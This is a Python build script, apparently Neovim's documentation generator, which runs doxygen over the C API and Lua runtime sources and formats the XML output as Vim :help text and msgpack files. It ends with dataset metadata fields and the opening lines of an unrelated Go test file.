para_as_map } recursive
update_params_map /
render_node
This would be easier using lxml and XSLT, but:
1. This should avoid needing Python dependencies, especially ones that are
C modules that have library dependencies (lxml requires libxml and
libxslt).
2. I wouldn't know how to deal with nested indentation in <para> tags using
XSLT.
Each function :help block is formatted as follows:
- Max width of 78 columns (`text_width`).
- Indent with spaces (not tabs).
- Indent of 16 columns for body text.
- Function signature and helptag (right-aligned) on the same line.
- Signature and helptag must have a minimum of 8 spaces between them.
- If the signature is too long, it is placed on the line after the helptag.
Signature wraps at `text_width - 8` characters with subsequent
lines indented to the open parenthesis.
- Subsection bodies are indented an additional 4 spaces.
- Body consists of function description, parameters, return description, and
C declaration (`INCLUDE_C_DECL`).
- Parameters are omitted for the `void` and `Error *` types, or if the
parameter is marked as [out].
- Each function documentation is separated by a single line.
"""
import argparse
import os
import re
import sys
import shutil
import textwrap
import subprocess
import collections
import msgpack
import logging
from xml.dom import minidom
MIN_PYTHON_VERSION = (3, 6)
MIN_DOXYGEN_VERSION = (1, 9, 0)
if sys.version_info < MIN_PYTHON_VERSION:
print("requires Python {}.{}+".format(*MIN_PYTHON_VERSION))
sys.exit(1)
doxygen_version = tuple([int(i) for i in subprocess.check_output(["doxygen", "-v"],
universal_newlines=True).split()[0].split('.')])
if doxygen_version < MIN_DOXYGEN_VERSION:
print("\nRequires doxygen {}.{}.{}+".format(*MIN_DOXYGEN_VERSION))
print("Your doxygen version is {}.{}.{}\n".format(*doxygen_version))
sys.exit(1)
# DEBUG = ('DEBUG' in os.environ)
INCLUDE_C_DECL = ('INCLUDE_C_DECL' in os.environ)
INCLUDE_DEPRECATED = ('INCLUDE_DEPRECATED' in os.environ)
log = logging.getLogger(__name__)
LOG_LEVELS = {
logging.getLevelName(level): level for level in [
logging.DEBUG, logging.INFO, logging.ERROR
]
}
text_width = 78
script_path = os.path.abspath(__file__)
base_dir = os.path.dirname(os.path.dirname(script_path))
out_dir = os.path.join(base_dir, 'tmp-{target}-doc')
filter_cmd = '%s %s' % (sys.executable, script_path)
msgs = [] # Messages to show on exit.
lua2dox_filter = os.path.join(base_dir, 'scripts', 'lua2dox_filter')
CONFIG = {
'api': {
'mode': 'c',
'filename': 'api.txt',
# Section ordering.
'section_order': [
'vim.c',
'vimscript.c',
'buffer.c',
'extmark.c',
'window.c',
'win_config.c',
'tabpage.c',
'autocmd.c',
'ui.c',
],
# List of files/directories for doxygen to read, relative to `base_dir`
'files': ['src/nvim/api'],
# file patterns used by doxygen
'file_patterns': '*.h *.c',
# Only function with this prefix are considered
'fn_name_prefix': 'nvim_',
# Section name overrides.
'section_name': {
'vim.c': 'Global',
},
# For generated section names.
'section_fmt': lambda name: f'{name} Functions',
# Section helptag.
'helptag_fmt': lambda name: f'*api-{name.lower()}*',
# Per-function helptag.
'fn_helptag_fmt': lambda fstem, name: f'*{name}()*',
# Module name overrides (for Lua).
'module_override': {},
# Append the docs for these modules, do not start a new section.
'append_only': [],
},
'lua': {
'mode': 'lua',
'filename': 'lua.txt',
'section_order': [
'_editor.lua',
'shared.lua',
'uri.lua',
'ui.lua',
'filetype.lua',
'keymap.lua',
'fs.lua',
],
'files': [
'runtime/lua/vim/_editor.lua',
'runtime/lua/vim/shared.lua',
'runtime/lua/vim/uri.lua',
'runtime/lua/vim/ui.lua',
'runtime/lua/vim/filetype.lua',
'runtime/lua/vim/keymap.lua',
'runtime/lua/vim/fs.lua',
],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {
'lsp.lua': 'core',
},
'section_fmt': lambda name: (
'Lua module: vim'
if name.lower() == '_editor'
else f'Lua module: {name.lower()}'),
'helptag_fmt': lambda name: (
'*lua-vim*'
if name.lower() == '_editor'
else f'*lua-{name.lower()}*'),
'fn_helptag_fmt': lambda fstem, name: (
f'*vim.{name}()*'
if fstem.lower() == '_editor'
else f'*{fstem}.{name}()*'),
'module_override': {
# `shared` functions are exposed on the `vim` module.
'shared': 'vim',
'uri': 'vim',
'ui': 'vim.ui',
'filetype': 'vim.filetype',
'keymap': 'vim.keymap',
'fs': 'vim.fs',
},
'append_only': [
'shared.lua',
],
},
'lsp': {
'mode': 'lua',
'filename': 'lsp.txt',
'section_order': [
'lsp.lua',
'buf.lua',
'diagnostic.lua',
'codelens.lua',
'tagfunc.lua',
'handlers.lua',
'util.lua',
'log.lua',
'rpc.lua',
'sync.lua',
'protocol.lua',
],
'files': [
'runtime/lua/vim/lsp',
'runtime/lua/vim/lsp.lua',
],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {'lsp.lua': 'lsp'},
'section_fmt': lambda name: (
'Lua module: vim.lsp'
if name.lower() == 'lsp'
else f'Lua module: vim.lsp.{name.lower()}'),
'helptag_fmt': lambda name: (
'*lsp-core*'
if name.lower() == 'lsp'
else f'*lsp-{name.lower()}*'),
'fn_helptag_fmt': lambda fstem, name: (
f'*vim.lsp.{name}()*'
if fstem == 'lsp' and name != 'client'
else (
'*vim.lsp.client*'
# HACK. TODO(justinmk): class/structure support in lua2dox
if 'lsp.client' == f'{fstem}.{name}'
else f'*vim.lsp.{fstem}.{name}()*')),
'module_override': {},
'append_only': [],
},
'diagnostic': {
'mode': 'lua',
'filename': 'diagnostic.txt',
'section_order': [
'diagnostic.lua',
],
'files': ['runtime/lua/vim/diagnostic.lua'],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {'diagnostic.lua': 'diagnostic'},
'section_fmt': lambda _: 'Lua module: vim.diagnostic',
'helptag_fmt': lambda _: '*diagnostic-api*',
'fn_helptag_fmt': lambda fstem, name: f'*vim.{fstem}.{name}()*',
'module_override': {},
'append_only': [],
},
'treesitter': {
'mode': 'lua',
'filename': 'treesitter.txt',
'section_order': [
'treesitter.lua',
'language.lua',
'query.lua',
'highlighter.lua',
'languagetree.lua',
],
'files': [
'runtime/lua/vim/treesitter.lua',
'runtime/lua/vim/treesitter/',
],
'file_patterns': '*.lua',
'fn_name_prefix': '',
'section_name': {},
'section_fmt': lambda name: (
'Lua module: vim.treesitter'
if name.lower() == 'treesitter'
else f'Lua module: vim.treesitter.{name.lower()}'),
'helptag_fmt': lambda name: (
'*lua-treesitter-core*'
if name.lower() == 'treesitter'
else f'*treesitter-{name.lower()}*'),
'fn_helptag_fmt': lambda fstem, name: (
f'*{name}()*'
if name != 'new'
else f'*{fstem}.{name}()*'),
# 'fn_helptag_fmt': lambda fstem, name: (
# f'*vim.treesitter.{name}()*'
# if fstem == 'treesitter'
# else (
# '*vim.lsp.client*'
# # HACK. TODO(justinmk): class/structure support in lua2dox
# if 'lsp.client' == f'{fstem}.{name}'
# else f'*vim.lsp.{fstem}.{name}()*')),
'module_override': {},
'append_only': [],
}
}
param_exclude = (
'channel_id',
)
# Annotations are displayed as line items after API function descriptions.
annotation_map = {
'FUNC_API_FAST': '|api-fast|',
'FUNC_API_CHECK_TEXTLOCK': 'not allowed when |textlock| is active',
'FUNC_API_REMOTE_ONLY': '|RPC| only',
'FUNC_API_LUA_ONLY': '|vim.api| only',
}
# Raises an error with details about `o`, if `cond` is in object `o`,
# or if `cond()` is callable and returns True.
def debug_this(o, cond=True):
name = ''
if not isinstance(o, str):
try:
name = o.nodeName
o = o.toprettyxml(indent=' ', newl='\n')
except Exception:
pass
if ((callable(cond) and cond())
or (not callable(cond) and cond)
or (not callable(cond) and cond in o)):
raise RuntimeError('xxx: {}\n{}'.format(name, o))
# Appends a message to a list which will be printed on exit.
def msg(s):
msgs.append(s)
# Print all collected messages.
def msg_report():
for m in msgs:
print(f' {m}')
# Print collected messages, then throw an exception.
def fail(s):
msg_report()
raise RuntimeError(s)
def find_first(parent, name):
"""Finds the first matching node within parent."""
sub = parent.getElementsByTagName(name)
if not sub:
return None
return sub[0]
def iter_children(parent, name):
"""Yields matching child nodes within parent."""
for child in parent.childNodes:
if child.nodeType == child.ELEMENT_NODE and child.nodeName == name:
yield child
def get_child(parent, name):
"""Gets the first matching child node."""
for child in iter_children(parent, name):
return child
return None
def self_or_child(n):
"""Gets the first child node, or self."""
if len(n.childNodes) == 0:
return n
return n.childNodes[0]
def clean_lines(text):
"""Removes superfluous lines.
The beginning and end of the string is trimmed. Empty lines are collapsed.
"""
return re.sub(r'\A\n\s*\n*|\n\s*\n*\Z', '', re.sub(r'(\n\s*\n+)+', '\n\n', text))
def is_blank(text):
return '' == clean_lines(text)
def get_text(n, preformatted=False):
"""Recursively concatenates all text in a node tree."""
text = ''
if n.nodeType == n.TEXT_NODE:
return n.data
if n.nodeName == 'computeroutput':
for node in n.childNodes:
text += get_text(node)
return '`{}`'.format(text)
for node in n.childNodes:
if node.nodeType == node.TEXT_NODE:
text += node.data
elif node.nodeType == node.ELEMENT_NODE:
text += get_text(node, preformatted)
return text
# Gets the length of the last line in `text`, excluding newline ("\n") char.
def len_lastline(text):
lastnl = text.rfind('\n')
if -1 == lastnl:
return len(text)
if '\n' == text[-1]:
return lastnl - (1 + text.rfind('\n', 0, lastnl))
return len(text) - (1 + lastnl)
def len_lastline_withoutindent(text, indent):
n = len_lastline(text)
return (n - len(indent)) if n > len(indent) else 0
# Returns True if node `n` contains only inline (not block-level) elements.
def is_inline(n):
# if len(n.childNodes) == 0:
# return n.nodeType == n.TEXT_NODE or n.nodeName == 'computeroutput'
for c in n.childNodes:
if c.nodeType != c.TEXT_NODE and c.nodeName != 'computeroutput':
return False
if not is_inline(c):
return False
return True
def doc_wrap(text, prefix='', width=70, func=False, indent=None):
"""Wraps text to `width`.
First line is prefixed with `prefix`, subsequent lines are aligned.
If `func` is True, only wrap at commas.
"""
if not width:
# return prefix + text
return text
# Whitespace used to indent all lines except the first line.
indent = ' ' * len(prefix) if indent is None else indent
indent_only = (prefix == '' and indent is not None)
if func:
lines = [prefix]
for part in text.split(', '):
if part[-1] not in ');':
part += ', '
if len(lines[-1]) + len(part) > width:
lines.append(indent)
lines[-1] += part
return '\n'.join(x.rstrip() for x in lines).rstrip()
# XXX: Dummy prefix to force TextWrapper() to wrap the first line.
if indent_only:
prefix = indent
tw = textwrap.TextWrapper(break_long_words=False,
break_on_hyphens=False,
width=width,
initial_indent=prefix,
subsequent_indent=indent)
result = '\n'.join(tw.wrap(text.strip()))
# XXX: Remove the dummy prefix.
if indent_only:
result = result[len(indent):]
return result
def max_name(names):
if len(names) == 0:
return 0
return max(len(name) for name in names)
def update_params_map(parent, ret_map, width=62):
"""Updates `ret_map` with name:desc key-value pairs extracted
from Doxygen XML node `parent`.
"""
params = collections.OrderedDict()
for node in parent.childNodes:
if node.nodeType == node.TEXT_NODE:
continue
name_node = find_first(node, 'parametername')
if name_node.getAttribute('direction') == 'out':
continue
name = get_text(name_node)
if name in param_exclude:
continue
params[name.strip()] = node
max_name_len = max_name(params.keys()) + 8
# `ret_map` is a name:desc map.
for name, node in params.items():
desc = ''
desc_node = get_child(node, 'parameterdescription')
if desc_node:
desc = fmt_node_as_vimhelp(
desc_node, width=width, indent=(' ' * max_name_len))
ret_map[name] = desc
return ret_map
def render_node(n, text, prefix='', indent='', width=62, fmt_vimhelp=False):
"""Renders a node as Vim help text, recursively traversing all descendants."""
def ind(s):
return s if fmt_vimhelp else ''
text = ''
# space_preceding = (len(text) > 0 and ' ' == text[-1][-1])
# text += (int(not space_preceding) * ' ')
if n.nodeName == 'preformatted':
o = get_text(n, preformatted=True)
ensure_nl = '' if o[-1] == '\n' else '\n'
text += '>{}{}\n<'.format(ensure_nl, o)
elif is_inline(n):
text = doc_wrap(get_text(n), indent=indent, width=width)
elif n.nodeName == 'verbatim':
# TODO: currently we don't use this. The "[verbatim]" hint is there as
# a reminder that we must decide how to format this if we do use it.
text += ' [verbatim] {}'.format(get_text(n))
elif n.nodeName == 'listitem':
for c in n.childNodes:
result = render_node(
c,
text,
indent=indent + (' ' * len(prefix)),
width=width
)
if is_blank(result):
continue
text += indent + prefix + result
elif n.nodeName in ('para', 'heading'):
for c in n.childNodes:
if (is_inline(c)
and '' != get_text(c).strip()
and text
and ' ' != text[-1]):
text += ' '
text += render_node(c, text, indent=indent, width=width)
elif n.nodeName == 'itemizedlist':
for c in n.childNodes:
text += '{}\n'.format(render_node(c, text, prefix='• ',
indent=indent, width=width))
elif n.nodeName == 'orderedlist':
i = 1
for c in n.childNodes:
if is_blank(get_text(c)):
text += '\n'
continue
text += '{}\n'.format(render_node(c, text, prefix='{}. '.format(i),
indent=indent, width=width))
i = i + 1
elif n.nodeName == 'simplesect' and 'note' == n.getAttribute('kind'):
text += '\nNote:\n '
for c in n.childNodes:
text += render_node(c, text, indent=' ', width=width)
text += '\n'
elif n.nodeName == 'simplesect' and 'warning' == n.getAttribute('kind'):
text += 'Warning:\n '
for c in n.childNodes:
text += render_node(c, text, indent=' ', width=width)
text += '\n'
elif (n.nodeName == 'simplesect'
and n.getAttribute('kind') in ('return', 'see')):
text += ind(' ')
for c in n.childNodes:
text += render_node(c, text, indent=' ', width=width)
elif n.nodeName == 'computeroutput':
return get_text(n)
else:
raise RuntimeError('unhandled node type: {}\n{}'.format(
n.nodeName, n.toprettyxml(indent=' ', newl='\n')))
return text
def para_as_map(parent, indent='', width=62, fmt_vimhelp=False):
"""Extracts a Doxygen XML <para> node to a map.
Keys:
'text': Text from this <para> element
'params': <parameterlist> map
'return': List of @return strings
'seealso': List of @see strings
'xrefs': ?
"""
chunks = {
'text': '',
'params': collections.OrderedDict(),
'return': [],
'seealso': [],
'xrefs': []
}
# Ordered dict of ordered lists.
groups = collections.OrderedDict([
('params', []),
('return', []),
('seealso', []),
('xrefs', []),
])
# Gather nodes into groups. Mostly this is because we want "parameterlist"
# nodes to appear together.
text = ''
kind = ''
last = ''
if is_inline(parent):
# Flatten inline text from a tree of non-block nodes.
text = doc_wrap(render_node(parent, "", fmt_vimhelp=fmt_vimhelp),
indent=indent, width=width)
else:
prev = None # Previous node
for child in parent.childNodes:
if child.nodeName == 'parameterlist':
groups['params'].append(child)
elif child.nodeName == 'xrefsect':
groups['xrefs'].append(child)
elif child.nodeName == 'simplesect':
last = kind
kind = child.getAttribute('kind')
if kind == 'return' or (kind == 'note' and last == 'return'):
groups['return'].append(child)
elif kind == 'see':
groups['seealso'].append(child)
elif kind in ('note', 'warning'):
text += render_node(child, text, indent=indent,
width=width, fmt_vimhelp=fmt_vimhelp)
else:
raise RuntimeError('unhandled simplesect: {}\n{}'.format(
child.nodeName, child.toprettyxml(indent=' ', newl='\n')))
else:
if (prev is not None
and is_inline(self_or_child(prev))
and is_inline(self_or_child(child))
and '' != get_text(self_or_child(child)).strip()
and text
and ' ' != text[-1]):
text += ' '
text += render_node(child, text, indent=indent, width=width,
fmt_vimhelp=fmt_vimhelp)
prev = child
chunks['text'] += text
# Generate map from the gathered items.
if len(groups['params']) > 0:
for child in groups['params']:
update_params_map(child, ret_map=chunks['params'], width=width)
for child in groups['return']:
chunks['return'].append(render_node(
child, '', indent=indent, width=width, fmt_vimhelp=fmt_vimhelp))
for child in groups['seealso']:
chunks['seealso'].append(render_node(
child, '', indent=indent, width=width, fmt_vimhelp=fmt_vimhelp))
xrefs = set()
for child in groups['xrefs']:
# XXX: Add a space (or any char) to `title` here, otherwise xrefs
# ("Deprecated" section) acts very weird...
title = get_text(get_child(child, 'xreftitle')) + ' '
xrefs.add(title)
xrefdesc = get_text(get_child(child, 'xrefdescription'))
chunks['xrefs'].append(doc_wrap(xrefdesc, prefix='{}: '.format(title),
width=width) + '\n')
return chunks, xrefs
def fmt_node_as_vimhelp(parent, width=62, indent='', fmt_vimhelp=False):
"""Renders (nested) Doxygen <para> nodes as Vim :help text.
NB: Blank lines in a docstring manifest as <para> tags.
"""
rendered_blocks = []
def fmt_param_doc(m):
"""Renders a params map as Vim :help text."""
max_name_len = max_name(m.keys()) + 4
out = ''
for name, desc in m.items():
name = ' {}'.format('{{{}}}'.format(name).ljust(max_name_len))
out += '{}{}\n'.format(name, desc)
return out.rstrip()
def has_nonexcluded_params(m):
"""Returns true if any of the given params has at least
one non-excluded item."""
if fmt_param_doc(m) != '':
return True
for child in parent.childNodes:
para, _ = para_as_map(child, indent, width, fmt_vimhelp)
# Generate text from the gathered items.
chunks = [para['text']]
if len(para['params']) > 0 and has_nonexcluded_params(para['params']):
chunks.append('\nParameters: ~')
chunks.append(fmt_param_doc(para['params']))
if len(para['return']) > 0:
chunks.append('\nReturn: ~')
for s in para['return']:
chunks.append(s)
if len(para['seealso']) > 0:
chunks.append('\nSee also: ~')
for s in para['seealso']:
chunks.append(s)
for s in para['xrefs']:
chunks.append(s)
rendered_blocks.append(clean_lines('\n'.join(chunks).strip()))
rendered_blocks.append('')
return clean_lines('\n'.join(rendered_blocks).strip())
def extract_from_xml(filename, target, width, fmt_vimhelp):
"""Extracts Doxygen info as maps without formatting the text.
Returns two maps:
1. Functions
2. Deprecated functions
The `fmt_vimhelp` variable controls some special cases for use by
fmt_doxygen_xml_as_vimhelp(). (TODO: ugly :)
"""
fns = {} # Map of func_name:docstring.
deprecated_fns = {} # Map of func_name:docstring.
dom = minidom.parse(filename)
compoundname = get_text(dom.getElementsByTagName('compoundname')[0])
for member in dom.getElementsByTagName('memberdef'):
if member.getAttribute('static') == 'yes' or \
member.getAttribute('kind') != 'function' or \
member.getAttribute('prot') == 'private' or \
get_text(get_child(member, 'name')).startswith('_'):
continue
loc = find_first(member, 'location')
if 'private' in loc.getAttribute('file'):
continue
return_type = get_text(get_child(member, 'type'))
if return_type == '':
continue
if return_type.startswith(('ArrayOf', 'DictionaryOf')):
parts = return_type.strip('_').split('_')
return_type = '{}({})'.format(parts[0], ', '.join(parts[1:]))
name = get_text(get_child(member, 'name'))
annotations = get_text(get_child(member, 'argsstring'))
if annotations and ')' in annotations:
annotations = annotations.rsplit(')', 1)[-1].strip()
# XXX: (doxygen 1.8.11) 'argsstring' only includes attributes of
# non-void functions. Special-case void functions here.
if name == 'nvim_get_mode' and len(annotations) == 0:
annotations += 'FUNC_API_FAST'
annotations = filter(None, map(lambda x: annotation_map.get(x),
annotations.split()))
params = []
type_length = 0
for param in iter_children(member, 'param'):
param_type = get_text(get_child(param, 'type')).strip()
param_name = ''
declname = get_child(param, 'declname')
if declname:
param_name = get_text(declname).strip()
elif CONFIG[target]['mode'] == 'lua':
# XXX: this is what lua2dox gives us...
param_name = param_type
param_type = ''
if param_name in param_exclude:
continue
if fmt_vimhelp and param_type.endswith('*'):
param_type = param_type.strip('* ')
param_name = '*' + param_name
type_length = max(type_length, len(param_type))
params.append((param_type, param_name))
# Handle Object Oriented style functions here.
# We make sure they have "self" in the parameters,
# and a parent function
if return_type.startswith('function') \
and len(return_type.split(' ')) >= 2 \
and any(x[1] == 'self' for x in params):
split_return = return_type.split(' ')
name = f'{split_return[1]}:{name}'
c_args = []
for param_type, param_name in params:
c_args.append((' ' if fmt_vimhelp else '') + (
'%s %s' % (param_type.ljust(type_length), param_name)).strip())
if not fmt_vimhelp:
pass
else:
fstem = '?'
if '.' in compoundname:
fstem = compoundname.split('.')[0]
fstem = CONFIG[target]['module_override'].get(fstem, fstem)
vimtag = CONFIG[target]['fn_helptag_fmt'](fstem, name)
prefix = '%s(' % name
suffix = '%s)' % ', '.join('{%s}' % a[1] for a in params
if a[0] not in ('void', 'Error'))
if not fmt_vimhelp:
c_decl = '%s %s(%s);' % (return_type, name, ', '.join(c_args))
signature = prefix + suffix
else:
c_decl = textwrap.indent('%s %s(\n%s\n);' % (return_type, name,
',\n'.join(c_args)),
' ')
# Minimum 8 chars between signature and vimtag
lhs = (width - 8) - len(vimtag)
if len(prefix) + len(suffix) > lhs:
signature = vimtag.rjust(width) + '\n'
signature += doc_wrap(suffix, width=width, prefix=prefix,
func=True)
else:
signature = prefix + suffix
signature += vimtag.rjust(width - len(signature))
# Tracks `xrefsect` titles. As of this writing, used only for separating
# deprecated functions.
xrefs_all = set()
paras = []
brief_desc = find_first(member, 'briefdescription')
if brief_desc:
for child in brief_desc.childNodes:
para, xrefs = para_as_map(child)
xrefs_all.update(xrefs)
desc = find_first(member, 'detaileddescription')
if desc:
for child in desc.childNodes:
para, xrefs = para_as_map(child)
paras.append(para)
xrefs_all.update(xrefs)
log.debug(
textwrap.indent(
re.sub(r'\n\s*\n+', '\n',
desc.toprettyxml(indent=' ', newl='\n')), ' ' * 16))
fn = {
'annotations': list(annotations),
'signature': signature,
'parameters': params,
'parameters_doc': collections.OrderedDict(),
'doc': [],
'return': [],
'seealso': [],
}
if fmt_vimhelp:
fn['desc_node'] = desc
fn['brief_desc_node'] = brief_desc
for m in paras:
if 'text' in m:
if not m['text'] == '':
fn['doc'].append(m['text'])
if 'params' in m:
# Merge OrderedDicts.
fn['parameters_doc'].update(m['params'])
if 'return' in m and len(m['return']) > 0:
fn['return'] += m['return']
if 'seealso' in m and len(m['seealso']) > 0:
fn['seealso'] += m['seealso']
if INCLUDE_C_DECL:
fn['c_decl'] = c_decl
if 'Deprecated' in str(xrefs_all):
deprecated_fns[name] = fn
elif name.startswith(CONFIG[target]['fn_name_prefix']):
fns[name] = fn
fns = collections.OrderedDict(sorted(
fns.items(),
key=lambda key_item_tuple: key_item_tuple[0].lower()))
deprecated_fns = collections.OrderedDict(sorted(deprecated_fns.items()))
return fns, deprecated_fns
def fmt_doxygen_xml_as_vimhelp(filename, target):
"""Entrypoint for generating Vim :help from from Doxygen XML.
Returns 3 items:
1. Vim help text for functions found in `filename`.
2. Vim help text for deprecated functions.
"""
fns_txt = {} # Map of func_name:vim-help-text.
deprecated_fns_txt = {} # Map of func_name:vim-help-text.
fns, _ = extract_from_xml(filename, target, text_width, True)
for name, fn in fns.items():
# Generate Vim :help for parameters.
if fn['desc_node']:
doc = fmt_node_as_vimhelp(fn['desc_node'], fmt_vimhelp=True)
if not doc and fn['brief_desc_node']:
doc = fmt_node_as_vimhelp(fn['brief_desc_node'])
if not doc:
doc = 'TODO: Documentation'
annotations = '\n'.join(fn['annotations'])
if annotations:
annotations = ('\n\nAttributes: ~\n' +
textwrap.indent(annotations, ' '))
i = doc.rfind('Parameters: ~')
if i == -1:
doc += annotations
else:
doc = doc[:i] + annotations + '\n\n' + doc[i:]
if INCLUDE_C_DECL:
doc += '\n\nC Declaration: ~\n>\n'
doc += fn['c_decl']
doc += '\n<'
func_doc = fn['signature'] + '\n'
func_doc += textwrap.indent(clean_lines(doc), ' ' * 16)
# Verbatim handling.
func_doc = re.sub(r'^\s+([<>])$', r'\1', func_doc, flags=re.M)
split_lines = func_doc.split('\n')
start = 0
while True:
try:
start = split_lines.index('>', start)
except ValueError:
break
try:
end = split_lines.index('<', start)
except ValueError:
break
split_lines[start + 1:end] = [
(' ' + x).rstrip()
for x in textwrap.dedent(
"\n".join(
split_lines[start+1:end]
)
).split("\n")
]
start = end
func_doc = "\n".join(split_lines)
if name.startswith(CONFIG[target]['fn_name_prefix']):
fns_txt[name] = func_doc
return ('\n\n'.join(list(fns_txt.values())),
'\n\n'.join(list(deprecated_fns_txt.values())))
def delete_lines_below(filename, tokenstr):
"""Deletes all lines below the line containing `tokenstr`, the line itself,
and one line above it.
"""
lines = open(filename).readlines()
i = 0
found = False
for i, line in enumerate(lines, 1):
if tokenstr in line:
found = True
break
if not found:
raise RuntimeError(f'not found: "{tokenstr}"')
i = max(0, i - 2)
with open(filename, 'wt') as fp:
fp.writelines(lines[0:i])
def main(config, args):
"""Generates:
1. Vim :help docs
2. *.mpack files for use by API clients
Doxygen is called and configured through stdin.
"""
for target in CONFIG:
if args.target is not None and target != args.target:
continue
mpack_file = os.path.join(
base_dir, 'runtime', 'doc',
CONFIG[target]['filename'].replace('.txt', '.mpack'))
if os.path.exists(mpack_file):
os.remove(mpack_file)
output_dir = out_dir.format(target=target)
log.info("Generating documentation for %s in folder %s",
target, output_dir)
debug = args.log_level >= logging.DEBUG
p = subprocess.Popen(
['doxygen', '-'],
stdin=subprocess.PIPE,
# silence warnings
# runtime/lua/vim/lsp.lua:209: warning: argument 'foo' not found
stderr=(subprocess.STDOUT if debug else subprocess.DEVNULL))
p.communicate(
config.format(
input=' '.join(
[f'"{file}"' for file in CONFIG[target]['files']]),
output=output_dir,
filter=filter_cmd,
file_patterns=CONFIG[target]['file_patterns'])
.encode('utf8')
)
if p.returncode:
sys.exit(p.returncode)
fn_map_full = {} # Collects all functions as each module is processed.
sections = {}
intros = {}
sep = '=' * text_width
base = os.path.join(output_dir, 'xml')
dom = minidom.parse(os.path.join(base, 'index.xml'))
# generate docs for section intros
for compound in dom.getElementsByTagName('compound'):
if compound.getAttribute('kind') != 'group':
continue
groupname = get_text(find_first(compound, 'name'))
groupxml = os.path.join(base, '%s.xml' %
compound.getAttribute('refid'))
group_parsed = minidom.parse(groupxml)
doc_list = []
brief_desc = find_first(group_parsed, 'briefdescription')
if brief_desc:
for child in brief_desc.childNodes:
doc_list.append(fmt_node_as_vimhelp(child))
desc = find_first(group_parsed, 'detaileddescription')
if desc:
doc = fmt_node_as_vimhelp(desc)
if doc:
doc_list.append(doc)
intros[groupname] = "\n".join(doc_list)
for compound in dom.getElementsByTagName('compound'):
if compound.getAttribute('kind') != 'file':
continue
filename = get_text(find_first(compound, 'name'))
if filename.endswith('.c') or filename.endswith('.lua'):
xmlfile = os.path.join(base,
'{}.xml'.format(compound.getAttribute('refid')))
# Extract unformatted (*.mpack).
fn_map, _ = extract_from_xml(xmlfile, target, 9999, False)
# Extract formatted (:help).
functions_text, deprecated_text = fmt_doxygen_xml_as_vimhelp(
os.path.join(base, '{}.xml'.format(
compound.getAttribute('refid'))), target)
if not functions_text and not deprecated_text:
continue
else:
name = os.path.splitext(
os.path.basename(filename))[0].lower()
sectname = name.upper() if name == 'ui' else name.title()
doc = ''
intro = intros.get(f'api-{name}')
if intro:
doc += '\n\n' + intro
if functions_text:
doc += '\n\n' + functions_text
if INCLUDE_DEPRECATED and deprecated_text:
doc += f'\n\n\nDeprecated {sectname} Functions: ~\n\n'
doc += deprecated_text
if doc:
filename = os.path.basename(filename)
sectname = CONFIG[target]['section_name'].get(
filename, sectname)
title = CONFIG[target]['section_fmt'](sectname)
helptag = CONFIG[target]['helptag_fmt'](sectname)
sections[filename] = (title, helptag, doc)
fn_map_full.update(fn_map)
if len(sections) == 0:
fail(f'no sections for target: {target}')
if len(sections) > len(CONFIG[target]['section_order']):
raise RuntimeError(
'found new modules "{}"; update the "section_order" map'.format(
set(sections).difference(CONFIG[target]['section_order'])))
first_section_tag = sections[CONFIG[target]['section_order'][0]][1]
docs = ''
i = 0
for filename in CONFIG[target]['section_order']:
try:
title, helptag, section_doc = sections.pop(filename)
except KeyError:
msg(f'warning: empty docs, skipping (target={target}): {filename}')
msg(f' existing docs: {sections.keys()}')
continue
i += 1
if filename not in CONFIG[target]['append_only']:
docs += sep
docs += '\n%s%s' % (title,
helptag.rjust(text_width - len(title)))
docs += section_doc
docs += '\n\n\n'
docs = docs.rstrip() + '\n\n'
docs += ' vim:tw=78:ts=8:ft=help:norl:\n'
doc_file = os.path.join(base_dir, 'runtime', 'doc',
CONFIG[target]['filename'])
if os.path.exists(doc_file):
delete_lines_below(doc_file, first_section_tag)
with open(doc_file, 'ab') as fp:
fp.write(docs.encode('utf8'))
fn_map_full = collections.OrderedDict(sorted(fn_map_full.items()))
with open(mpack_file, 'wb') as fp:
fp.write(msgpack.packb(fn_map_full, use_bin_type=True))
if not args.keep_tmpfiles:
shutil.rmtree(output_dir)
msg_report()
def filter_source(filename):
name, extension = os.path.splitext(filename)
if extension == '.lua':
p = subprocess.run([lua2dox_filter, filename], stdout=subprocess.PIPE)
op = ('?' if 0 != p.returncode else p.stdout.decode('utf-8'))
print(op)
else:
"""Filters the source to fix macros that confuse Doxygen."""
with open(filename, 'rt') as fp:
print(re.sub(r'^(ArrayOf|DictionaryOf)(\(.*?\))',
lambda m: m.group(1)+'_'.join(
re.split(r'[^\w]+', m.group(2))),
fp.read(), flags=re.M))
def parse_args():
targets = ', '.join(CONFIG.keys())
ap = argparse.ArgumentParser(
description="Generate helpdoc from source code")
ap.add_argument(
"--log-level", "-l", choices=LOG_LEVELS.keys(),
default=logging.getLevelName(logging.ERROR), help="Set log verbosity"
)
ap.add_argument('source_filter', nargs='*',
help="Filter source file(s)")
ap.add_argument('-k', '--keep-tmpfiles', action='store_true',
help="Keep temporary files")
ap.add_argument('-t', '--target',
help=f'One of ({targets}), defaults to "all"')
return ap.parse_args()
Doxyfile = textwrap.dedent('''
OUTPUT_DIRECTORY = {output}
INPUT = {input}
INPUT_ENCODING = UTF-8
FILE_PATTERNS = {file_patterns}
RECURSIVE = YES
INPUT_FILTER = "{filter}"
EXCLUDE =
EXCLUDE_SYMLINKS = NO
EXCLUDE_PATTERNS = */private/* */health.lua */_*.lua
EXCLUDE_SYMBOLS =
EXTENSION_MAPPING = lua=C
EXTRACT_PRIVATE = NO
GENERATE_HTML = NO
GENERATE_DOCSET = NO
GENERATE_HTMLHELP = NO
GENERATE_QHP = NO
GENERATE_TREEVIEW = NO
GENERATE_LATEX = NO
GENERATE_RTF = NO
GENERATE_MAN = NO
GENERATE_DOCBOOK = NO
GENERATE_AUTOGEN_DEF = NO
GENERATE_XML = YES
XML_OUTPUT = xml
XML_PROGRAMLISTING = NO
ENABLE_PREPROCESSING = YES
MACRO_EXPANSION = YES
EXPAND_ONLY_PREDEF = NO
MARKDOWN_SUPPORT = YES
''')
if __name__ == "__main__":
args = parse_args()
print("Setting log level to %s" % args.log_level)
args.log_level = LOG_LEVELS[args.log_level]
log.setLevel(args.log_level)
log.addHandler(logging.StreamHandler())
if len(args.source_filter) > 0:
filter_source(args.source_filter[0])
else:
main(Doxyfile, args)
# vim: set ft=python ts=4 sw=4 tw=79 et :
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
pglogrepl_test.go
|
package pglogrepl_test
import (
"context"
